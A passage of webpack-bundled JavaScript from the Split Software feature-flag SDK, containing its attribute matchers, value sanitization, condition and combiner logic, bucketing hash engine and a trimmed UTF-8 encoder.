  return function partOfMatcher(runtimeAttr
  /*: array */
  )
  /*: boolean */
  {
    // To be part of the length should be minor or equal.
    var isPartOf = runtimeAttr.length <= ruleAttr.length;

    var _loop = function _loop(i) {
      // If the length says is possible, we iterate until we prove otherwise or we check all elements.
      if (Object(__WEBPACK_IMPORTED_MODULE_1__utils_lang__["c" /* findIndex */])(ruleAttr, function (e) {
        return e === runtimeAttr[i];
      }) < 0) isPartOf = false;
    };

    for (var i = 0; i < runtimeAttr.length && isPartOf; i++) {
      _loop(i);
    }

    log.debug("[partOfMatcher] " + runtimeAttr + " is part of " + ruleAttr + "? " + isPartOf);
    return isPartOf;
  };
}

/* harmony default export */ __webpack_exports__["a"] = (partOfMatcherContext);

/***/ }),
/* 2813 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_logger__ = __webpack_require__(9);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_lang__ = __webpack_require__(13);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/

var log = Object(__WEBPACK_IMPORTED_MODULE_0__utils_logger__["b" /* default */])('splitio-engine:matcher');


function startsWithMatcherContext(ruleAttr
/*: array */
)
/*: Function */
{
  return function startsWithMatcher(runtimeAttr
  /*: string */
  )
  /*: boolean */
  {
    var matches = ruleAttr.some(function (e) {
      return Object(__WEBPACK_IMPORTED_MODULE_1__utils_lang__["o" /* startsWith */])(runtimeAttr, e);
    });
    log.debug("[startsWithMatcher] " + runtimeAttr + " starts with " + ruleAttr + "? " + matches);
    return matches;
  };
}

/* harmony default export */ __webpack_exports__["a"] = (startsWithMatcherContext);

/***/ }),
/* 2814 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_logger__ = __webpack_require__(9);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_lang__ = __webpack_require__(13);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/

var log = Object(__WEBPACK_IMPORTED_MODULE_0__utils_logger__["b" /* default */])('splitio-engine:matcher');


function endsWithMatcherContext(ruleAttr
/*: array */
)
/*: Function */
{
  return function endsWithMatcher(runtimeAttr
  /*: string */
  )
  /*: boolean */
  {
    var endsWith = ruleAttr.some(function (e) {
      return Object(__WEBPACK_IMPORTED_MODULE_1__utils_lang__["a" /* endsWith */])(runtimeAttr, e);
    });
    log.debug("[endsWithMatcher] " + runtimeAttr + " ends with " + ruleAttr + "? " + endsWith);
    return endsWith;
  };
}

/* harmony default export */ __webpack_exports__["a"] = (endsWithMatcherContext);

/***/ }),
/* 2815 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_lang__ = __webpack_require__(13);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_logger__ = __webpack_require__(9);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/


var log = Object(__WEBPACK_IMPORTED_MODULE_1__utils_logger__["b" /* default */])('splitio-engine:matcher');

function containsStringMatcherContext(ruleAttr
/*: array */
)
/*: Function */
{
  return function containsStringMatcher(runtimeAttr
  /*: string */
  )
  /*: boolean */
  {
    var contains = ruleAttr.some(function (e) {
      return Object(__WEBPACK_IMPORTED_MODULE_0__utils_lang__["j" /* isString */])(runtimeAttr) && runtimeAttr.indexOf(e) > -1;
    });
    log.debug("[containsStringMatcher] " + runtimeAttr + " contains " + ruleAttr + "? " + contains);
    return contains;
  };
}

/* harmony default export */ __webpack_exports__["a"] = (containsStringMatcherContext);

/***/ }),
/* 2816 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_logger__ = __webpack_require__(9);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_promise_thenable__ = __webpack_require__(75);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/

var log = Object(__WEBPACK_IMPORTED_MODULE_0__utils_logger__["b" /* default */])('splitio-engine:matcher');


function checkTreatment(evaluation, acceptableTreatments, parentName) {
  var matches = false;

  if (Array.isArray(acceptableTreatments)) {
    matches = acceptableTreatments.indexOf(evaluation.treatment) !== -1;
  }

  log.debug("[dependencyMatcher] Parent split \"" + parentName + "\" evaluated to \"" + evaluation.treatment + "\" with label \"" + evaluation.label + "\". " + parentName + " evaluated treatment is part of [" + acceptableTreatments + "] ? " + matches + ".");
  return matches;
}

function dependencyMatcherContext(_ref, storage) {
  var split = _ref.split,
      treatments = _ref.treatments;
  return function dependencyMatcher(_ref2, splitEvaluator) {
    var key = _ref2.key,
        attributes = _ref2.attributes;
    log.debug("[dependencyMatcher] will evaluate parent split: \"" + split + "\" with key: " + JSON.stringify(key) + " " + (attributes ? "\n attributes: " + JSON.stringify(attributes) : ''));
    var evaluation = splitEvaluator(key, split, attributes, storage);

    if (Object(__WEBPACK_IMPORTED_MODULE_1__utils_promise_thenable__["a" /* default */])(evaluation)) {
      return evaluation.then(function (ev) {
        return checkTreatment(ev, treatments, split);
      });
    } else {
      return checkTreatment(evaluation, treatments, split);
    }
  };
}

/* harmony default export */ __webpack_exports__["a"] = (dependencyMatcherContext);

/***/ }),
/* 2817 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_logger__ = __webpack_require__(9);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/

var log = Object(__WEBPACK_IMPORTED_MODULE_0__utils_logger__["b" /* default */])('splitio-engine:matcher');

function booleanMatcherContext(ruleAttr
/*: bool */
)
/*: Function */
{
  return function booleanMatcher(runtimeAttr
  /*: bool */
  )
  /*: bool */
  {
    var booleanMatches = ruleAttr === runtimeAttr;
    log.debug("[booleanMatcher] " + ruleAttr + " === " + runtimeAttr);
    return booleanMatches;
  };
}

/* harmony default export */ __webpack_exports__["a"] = (booleanMatcherContext);

/***/ }),
/* 2818 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_logger__ = __webpack_require__(9);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/

var log = Object(__WEBPACK_IMPORTED_MODULE_0__utils_logger__["b" /* default */])('splitio-engine:matcher');

function stringMatcherContext(ruleAttr
/*: regex */
)
/*: Function */
{
  return function stringMatcher(runtimeAttr
  /*: string */
  )
  /*: bool */
  {
    var re;

    try {
      re = new RegExp(ruleAttr);
    } catch (e) {
      log.debug("[stringMatcher] " + ruleAttr + " is an invalid regex");
      return false;
    }

    var regexMatches = re.test(runtimeAttr);
    log.debug("[stringMatcher] does " + runtimeAttr + " matches with " + ruleAttr + "? " + (regexMatches ? 'yes' : 'no'));
    return regexMatches;
  };
}

/* harmony default export */ __webpack_exports__["a"] = (stringMatcherContext);

/***/ }),
/* 2819 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_logger__ = __webpack_require__(9);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__sanitize__ = __webpack_require__(2820);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/

var log = Object(__WEBPACK_IMPORTED_MODULE_0__utils_logger__["b" /* default */])('splitio-engine:value');


function parseValue(key, attributeName, attributes) {
  var value = undefined;

  if (attributeName) {
    if (attributes) {
      value = attributes[attributeName];
      log.debug("Extracted attribute [" + attributeName + "], [" + value + "] will be used for matching.");
    } else {
      log.warn("Defined attribute [" + attributeName + "], no attributes received.");
    }
  } else {
    value = key;
  }

  return value;
}
/**
 * Defines value to be matched (key / attribute).
 */


function value(key, matcherDto, attributes) {
  var attributeName = matcherDto.attribute;
  var valueToMatch = parseValue(key, attributeName, attributes);
  var sanitizedValue = Object(__WEBPACK_IMPORTED_MODULE_1__sanitize__["a" /* default */])(matcherDto.type, valueToMatch, matcherDto.dataType, attributes);

  if (sanitizedValue !== undefined) {
    return sanitizedValue;
  } else {
    log.warn("Value " + valueToMatch + " " + (attributeName ? "for attribute " + attributeName + " " : +'') + "doesn't match with expected type.");
    return;
  }
}

/* harmony default export */ __webpack_exports__["a"] = (value);

/***/ }),
/* 2820 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_logger__ = __webpack_require__(9);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_lang__ = __webpack_require__(13);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__convertions__ = __webpack_require__(1282);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__matchers_types__ = __webpack_require__(698);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/

var log = Object(__WEBPACK_IMPORTED_MODULE_0__utils_logger__["b" /* default */])('splitio-engine:sanitize');



var MATCHERS = __WEBPACK_IMPORTED_MODULE_3__matchers_types__["c" /* types */];
var DATA_TYPES = __WEBPACK_IMPORTED_MODULE_3__matchers_types__["a" /* dataTypes */];

function sanitizeNumber(val) {
  var num = Object(__WEBPACK_IMPORTED_MODULE_1__utils_lang__["p" /* toNumber */])(val);
  return isNaN(num) ? undefined : num;
}

function sanitizeString(val) {
  var valueToSanitize = val;

  if (Object(__WEBPACK_IMPORTED_MODULE_1__utils_lang__["i" /* isObject */])(val)) {
    // If the value is an object and is not a key, discard it.
    valueToSanitize = val.matchingKey ? val.matchingKey : undefined;
  }

  var str = Object(__WEBPACK_IMPORTED_MODULE_1__utils_lang__["q" /* toString */])(valueToSanitize);
  return str ? str : undefined;
}

function sanitizeArray(val) {
  var arr = Array.isArray(val) ? Object(__WEBPACK_IMPORTED_MODULE_1__utils_lang__["s" /* uniq */])(val.map(function (e) {
    return e + '';
  })) : [];
  return arr.length ? arr : undefined;
}

function sanitizeBoolean(val) {
  if (val === true || val === false) return val;

  if (typeof val === 'string') {
    var lowerCaseValue = val.toLocaleLowerCase();
    if (lowerCaseValue === 'true') return true;
    if (lowerCaseValue === 'false') return false;
  }

  return undefined;
}

function dependencyProcessor(sanitizedValue, attributes) {
  return {
    key: sanitizedValue,
    attributes: attributes
  };
}
/**
 * We can define a pre-processing for the value, to be executed prior to matcher evaluation.
 */


function getProcessingFunction(matcherTypeID, dataType) {
  switch (matcherTypeID) {
    case MATCHERS.EQUAL_TO:
      return dataType === 'DATETIME' ? __WEBPACK_IMPORTED_MODULE_2__convertions__["a" /* zeroSinceHH */] : undefined;

    case MATCHERS.GREATER_THAN_OR_EQUAL_TO:
    case MATCHERS.LESS_THAN_OR_EQUAL_TO:
    case MATCHERS.BETWEEN:
      return dataType === 'DATETIME' ? __WEBPACK_IMPORTED_MODULE_2__convertions__["b" /* zeroSinceSS */] : undefined;

    case MATCHERS.IN_SPLIT_TREATMENT:
      return dependencyProcessor;

    default:
      return undefined;
  }
}

function sanitizeValue(matcherTypeID, value, dataType, attributes) {
  var processor = getProcessingFunction(matcherTypeID, dataType);
  var sanitizedValue;

  switch (dataType) {
    case DATA_TYPES.NUMBER:
    case DATA_TYPES.DATETIME:
      sanitizedValue = sanitizeNumber(value);
      break;

    case DATA_TYPES.STRING:
      sanitizedValue = sanitizeString(value);
      break;

    case DATA_TYPES.SET:
      sanitizedValue = sanitizeArray(value);
      break;

    case DATA_TYPES.BOOLEAN:
      sanitizedValue = sanitizeBoolean(value);
      break;

    case DATA_TYPES.NOT_SPECIFIED:
      sanitizedValue = value;
      break;

    default:
      sanitizedValue = undefined;
  }

  if (processor) {
    sanitizedValue = processor(sanitizedValue, attributes);
  }

  log.debug("Attempted to sanitize [" + value + "] which should be of type [" + dataType + "]. \n Sanitized and processed value => [" + (sanitizedValue instanceof Object ? JSON.stringify(sanitizedValue) : sanitizedValue) + "]");
  return sanitizedValue;
}

/* harmony default export */ __webpack_exports__["a"] = (sanitizeValue);

/***/ }),
/* 2821 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__engine__ = __webpack_require__(2822);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_promise_thenable__ = __webpack_require__(75);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__utils_labels__ = __webpack_require__(277);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/


 // Build Evaluation object if and only if matchingResult is true

function match(matchingResult, bucketingKey, seed, treatments, label, algo) {
  if (matchingResult) {
    var treatment = __WEBPACK_IMPORTED_MODULE_0__engine__["a" /* default */].getTreatment(bucketingKey, seed, treatments, algo);
    return {
      treatment: treatment,
      label: label
    };
  } // else we should notify the engine to continue evaluating


  return undefined;
} // Condition factory


function conditionContext(matcherEvaluator, treatments, label, conditionType) {
  function conditionEvaluator(key, seed, trafficAllocation, trafficAllocationSeed, splitEvaluator, attributes, algo) {
    // Whitelisting has more priority than traffic allocation, so we don't apply this filtering to those conditions.
    if (conditionType === 'ROLLOUT' && !__WEBPACK_IMPORTED_MODULE_0__engine__["a" /* default */].shouldApplyRollout(trafficAllocation, key.bucketingKey, trafficAllocationSeed, algo)) {
      return {
        treatment: undefined,
        label: __WEBPACK_IMPORTED_MODULE_2__utils_labels__["b" /* NOT_IN_SPLIT */]
      };
    } // matcherEvaluator could be Async, this relays on matchers return value, so we need
    // to verify for thenable before play with the result.
    // Also, we pass splitEvaluator function in case we have a matcher that needs to evaluate another split,
    // as well as the entire key object for the same reason.


    var matches = matcherEvaluator(key, attributes, splitEvaluator);

    if (Object(__WEBPACK_IMPORTED_MODULE_1__utils_promise_thenable__["a" /* default */])(matches)) {
      return matches.then(function (result) {
        return match(result, key.bucketingKey, seed, treatments, label, algo);
      });
    }

    return match(matches, key.bucketingKey, seed, treatments, label, algo);
  }

  return conditionEvaluator;
}

/* harmony default export */ __webpack_exports__["a"] = (conditionContext);

/***/ }),
/* 2822 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_logger__ = __webpack_require__(9);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__legacy__ = __webpack_require__(2823);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__murmur3_murmur3__ = __webpack_require__(699);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/

var log = Object(__WEBPACK_IMPORTED_MODULE_0__utils_logger__["b" /* default */])('splitio-engine');


var MURMUR_ID = 2;
/**
 * Returns the bucket function by algoId.
 */

function getBucketAlgo(algoId) {
  if (algoId === MURMUR_ID) {
    return __WEBPACK_IMPORTED_MODULE_2__murmur3_murmur3__["a" /* default */].bucket;
  } else {
    return __WEBPACK_IMPORTED_MODULE_1__legacy__["a" /* default */].bucket;
  }
}

var engine = {
  /**
   * Get the treatment name given a key, a seed, and the percentage of each treatment.
   */
  getTreatment: function getTreatment(key, seed, treatments, algoId) {
    var bucket = getBucketAlgo(algoId)(key, seed);
    var treatment = treatments.getTreatmentFor(bucket);
    log.debug("[engine] using algo " + (algoId !== MURMUR_ID ? 'legacy' : 'murmur') + " bucket " + bucket + " for key " + key + " using seed " + seed + " - treatment " + treatment);
    return treatment;
  },

  /**
   * Evaluates the traffic allocation to see if we should apply rollout conditions or not.
   */
  shouldApplyRollout: function shouldApplyRollout(trafficAllocation, key, trafficAllocationSeed, algoId) {
    // For rollout, if traffic allocation for splits is 100%, we don't need to filter it because everything should evaluate the rollout.
    if (trafficAllocation < 100) {
      var bucket = getBucketAlgo(algoId)(key, trafficAllocationSeed);

      if (bucket > trafficAllocation) {
        return false;
      }
    }

    return true;
  }
};
/* harmony default export */ __webpack_exports__["a"] = (engine);

/***/ }),
/* 2823 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/
//
// JAVA reference implementation for the hashing function.
//
// int h = 0;
// for (int i = 0; i < key.length(); i++) {
//     h = 31 * h + key.charAt(i);
// }
// return h ^ seed; // XOR the hash and seed
//
function ToInteger(x) {
  x = Number(x);
  return x < 0 ? Math.ceil(x) : Math.floor(x);
}

function modulo(a, b) {
  return a - Math.floor(a / b) * b;
}

function ToUint32(x) {
  return modulo(ToInteger(x), Math.pow(2, 32));
}

function ToInt32(x) {
  var uint32 = ToUint32(x);

  if (uint32 >= Math.pow(2, 31)) {
    return uint32 - Math.pow(2, 32);
  } else {
    return uint32;
  }
}

function hash(str
/*: string */
, seed
/*: number */
)
/*: number */
{
  var h = 0;

  for (var i = 0; i < str.length; i++) {
    h = ToInt32(ToInt32(31 * h) + str.charCodeAt(i));
  }

  return ToInt32(h ^ seed);
}

function bucket(str
/*: string */
, seed
/*: number */
)
/*: number */
{
  return Math.abs(hash(str, seed) % 100) + 1;
}

/* harmony default export */ __webpack_exports__["a"] = ({
  hash: hash,
  bucket: bucket
});

/***/ }),
/* 2824 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = encodeUTF16toUTF8;
/* harmony export (immutable) */ __webpack_exports__["c"] = stringSource;
/* harmony export (immutable) */ __webpack_exports__["b"] = stringDestination;
/*
 Trimmed version of "utfx" library (https://www.npmjs.com/package/utfx/v/1.0.1) used to encode,
 decode and convert UTF8 / UTF16 in JavaScript, with the minimal methods used by the SDK.

 utfx (c) 2014 Daniel Wirtz <dcode@dcode.io>
 Released under the Apache License, Version 2.0
 see: https://github.com/dcodeIO/utfx for details
*/

/**
 * Encodes UTF8 code points to UTF8 bytes.
 * @param {(!function():number|null) | number} src Code points source, either as a function returning the next code point
 *  respectively `null` if there are no more code points left or a single numeric code point.
 * @param {!function(number)} dst Bytes destination as a function successively called with the next byte
 * @expose
 */
function encodeUTF8(src, dst) {
  var cp = null;
  if (typeof src === 'number') cp = src, src = function src() {
    return null;
  };

  while (cp !== null || (cp = src()) !== null) {
    if (cp < 0x80) dst(cp & 0x7F);else if (cp < 0x800) dst(cp >> 6 & 0x1F | 0xC0), dst(cp & 0x3F | 0x80);else if (cp < 0x10000) dst(cp >> 12 & 0x0F | 0xE0), dst(cp >> 6 & 0x3F | 0x80), dst(cp & 0x3F | 0x80);else dst(cp >> 18 & 0x07 | 0xF0), dst(cp >> 12 & 0x3F | 0x80), dst(cp >> 6 & 0x3F | 0x80), dst(cp & 0x3F | 0x80);
    cp = null;
  }
}
/**
 * Converts UTF16 characters to UTF8 code points.
 * @param {!function():number|null} src Characters source as a function returning the next char code respectively
 *  `null` if there are no more characters left.
 * @param {!function(number)} dst Code points destination as a function successively called with each converted code
 *  point.
 * @expose
 */


function UTF16toUTF8(src, dst) {
  var c1,
      c2 = null; // eslint-disable-next-line no-constant-condition

  while (true) {
    if ((c1 = c2 !== null ? c2 : src()) === null) break;

    if (c1 >= 0xD800 && c1 <= 0xDFFF) {
      if ((c2 = src()) !== null) {
        if (c2 >= 0xDC00 && c2 <= 0xDFFF) {
          dst((c1 - 0xD800) * 0x400 + c2 - 0xDC00 + 0x10000);
          c2 = null;
          continue;
        }
      }
    }

    dst(c1);
  }

  if (c2 !== null) dst(c2);
}
/**
 * Converts and encodes UTF16 characters to UTF8 bytes.
 * @param {!function():number|null} src Characters source as a function returning the next char code respectively `null`
 *  if there are no more characters left.
 * @param {!function(number)} dst Bytes destination as a function successively called with the next byte.
 * @expose
 */


function encodeUTF16toUTF8(src, dst) {
  UTF16toUTF8(src, function (cp) {
    encodeUTF8(cp, dst);
  });
}
/**
 * String.fromCharCode reference for compile time renaming.
 * @type {!function(...[number]):string}
 * @inner
 */

var stringFromCharCode = String.fromCharCode;
/**
 * Creates a source function for a string.
 * @param {string} s String to read from
 * @returns {!function():number|null} Source function returning the next char code respectively `null` if there are
 *  no more characters left.
 * @throws {TypeError} If the argument is invalid
 * @expose
 */

function stringSource(s) {
  if (typeof s !== 'string') throw TypeError('Illegal argument: ' + typeof s);
  var i = 0;
  return function () {
    return i >= s.length ? null : s.charCodeAt(i++);
  };
}
/**
 * Creates a destination function for a string.
 * @returns {function(number=):undefined|string} Destination function successively called with the next char code.
 *  Returns the final string when called without arguments.
 * @expose
 */

function stringDestination() {
  var cs = [],
      ps = [];
  return function () {
    if (arguments.length === 0) return ps.join('') + stringFromCharCode.apply(String, cs);
    if (cs.length + arguments.length > 1024) ps.push(stringFromCharCode.apply(String, cs)), cs.length = 0;
    Array.prototype.push.apply(cs, arguments);
  };
}

/***/ }),
/* 2825 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_lang__ = __webpack_require__(13);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_logger__ = __webpack_require__(9);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__utils_promise_thenable__ = __webpack_require__(75);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__utils_labels__ = __webpack_require__(277);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__utils_constants__ = __webpack_require__(56);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/


var log = Object(__WEBPACK_IMPORTED_MODULE_1__utils_logger__["b" /* default */])('splitio-engine:combiner');




function unexpectedInputHandler() {
  log.error('Invalid Split provided, no valid conditions found');
  return {
    treatment: __WEBPACK_IMPORTED_MODULE_4__utils_constants__["b" /* CONTROL */],
    label: __WEBPACK_IMPORTED_MODULE_3__utils_labels__["a" /* EXCEPTION */]
  };
}

function computeTreatment(predicateResults) {
  var len = predicateResults.length;

  for (var i = 0; i < len; i++) {
    var evaluation = predicateResults[i];

    if (evaluation !== undefined) {
      log.debug("Treatment found: " + evaluation.treatment);
      return evaluation;
    }
  }

  log.debug('All predicates evaluated, no treatment found.');
  return undefined;
}

function ifElseIfCombinerContext(predicates) {
  function ifElseIfCombiner(key, seed, trafficAllocation, trafficAllocationSeed, attributes, algo, splitEvaluator) {
    // In Async environments we are going to have async predicates. There is none way to know
    // before hand so we need to evaluate all the predicates, verify for thenables, and finally,
    // define how to return the treatment (wrap result into a Promise or not).
    var predicateResults = predicates.map(function (evaluator) {
      return evaluator(key, seed, trafficAllocation, trafficAllocationSeed, splitEvaluator, attributes, algo);
    }); // if we find a thenable

    if (Object(__WEBPACK_IMPORTED_MODULE_0__utils_lang__["c" /* findIndex */])(predicateResults, __WEBPACK_IMPORTED_MODULE_2__utils_promise_thenable__["a" /* default */]) !== -1) {
      return Promise.all(predicateResults).then(function (results) {
        return computeTreatment(results);
      });
    }

    return computeTreatment(predicateResults);
  } // if there is none predicates, then there was an error in parsing phase


  if (!Array.isArray(predicates) || Array.isArray(predicates) && predicates.length === 0) {
    return unexpectedInputHandler;
  } else {
    return ifElseIfCombiner;
  }
}

/* harmony default export */ __webpack_exports__["a"] = (ifElseIfCombinerContext);

/***/ }),
/* 2826 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_lang__ = __webpack_require__(13);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_logger__ = __webpack_require__(9);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__utils_promise_thenable__ = __webpack_require__(75);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/


var log = Object(__WEBPACK_IMPORTED_MODULE_1__utils_logger__["b" /* default */])('splitio-engine:combiner');


function andResults(results) {
  var i = 0;
  var len = results.length;
  var hasMatchedAll; // loop through all the matchers an stop at the first one returning false.

  for (; i < len && results[i]; i++) {// logic is run inside the condition of evaluates next step.
  }

  hasMatchedAll = i === len;
  log.debug("[andCombiner] evaluates to " + hasMatchedAll);
  return hasMatchedAll;
}

function andCombinerContext(matchers) {
  function andCombiner() {
    for (var _len = arguments.length, params = new Array(_len), _key = 0; _key < _len; _key++) {
      params[_key] = arguments[_key];
    }

    var matcherResults = matchers.map(function (matcher) {
      return matcher.apply(void 0, params);
    }); // If any matching result is a thenable we should use Promise.all

    if (Object(__WEBPACK_IMPORTED_MODULE_0__utils_lang__["c" /* findIndex */])(matcherResults, __WEBPACK_IMPORTED_MODULE_2__utils_promise_thenable__["a" /* default */]) !== -1) {
      return Promise.all(matcherResults).then(andResults);
    } else {
      return andResults(matcherResults);
    }
  }

  return andCombiner;
}

/* harmony default export */ __webpack_exports__["a"] = (andCombinerContext);

/***/ }),
/* 2827 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign__ = __webpack_require__(22);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_object_assign__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_logger__ = __webpack_require__(9);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__utils_promise_thenable__ = __webpack_require__(75);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__impressions_observer__ = __webpack_require__(2828);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__utils_time__ = __webpack_require__(1284);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__utils_constants__ = __webpack_require__(56);
/**
Copyright 2016 Split Software

